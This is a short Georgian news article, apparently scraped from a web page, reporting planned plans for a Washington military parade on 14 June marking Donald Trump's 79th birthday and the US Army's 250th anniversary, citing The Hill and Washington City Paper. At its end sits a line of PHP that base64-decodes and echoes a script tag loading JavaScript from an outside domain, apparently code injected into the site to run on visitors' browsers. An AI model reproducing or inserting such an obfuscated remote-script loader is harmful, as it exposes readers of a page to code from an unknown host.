gorgia
ავერსი jaluzi

აშშ-ის პრეზიდენტის ადმინისტრაცია 14 ივნისს, პრეზიდენტ დონალდ ტრამპის 79-ე დაბადების დღის აღსანიშნავად ვაშინგტონის ქუჩებში სამხედრო აღლუმის ჩატარებას გეგმავს, - ინფორმაციას The Hill-ი ავრცელებს.

გამოცემა აშშ-ის პრეზიდენტის ადმინისტრაციის მაღალჩინოსანზე დაყრდნობით იუწყება, რომ ამავე დღეს არმიის 250 წლის იუბილე აღინიშნება.

ამასთან, Washington City Paper-ის ცნობით, რომელმაც პირველმა გაავრცელა ინფორმაცია აღლუმის შესახებ, ღონისძიება თითქმის 4 მილის მანძილს მოიცავს. არმიის ოფიციალურმა პირმა The Hill-ს ეს ინფორმაცია დაუდასტურა და განუცხადა, რომ აღლუმთან დაკავშირებული გეგმები არსებობს, თუმცა საბოლოოდ ჩამოყალიბებული, ჯერჯერობით, არაფერია.

91
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");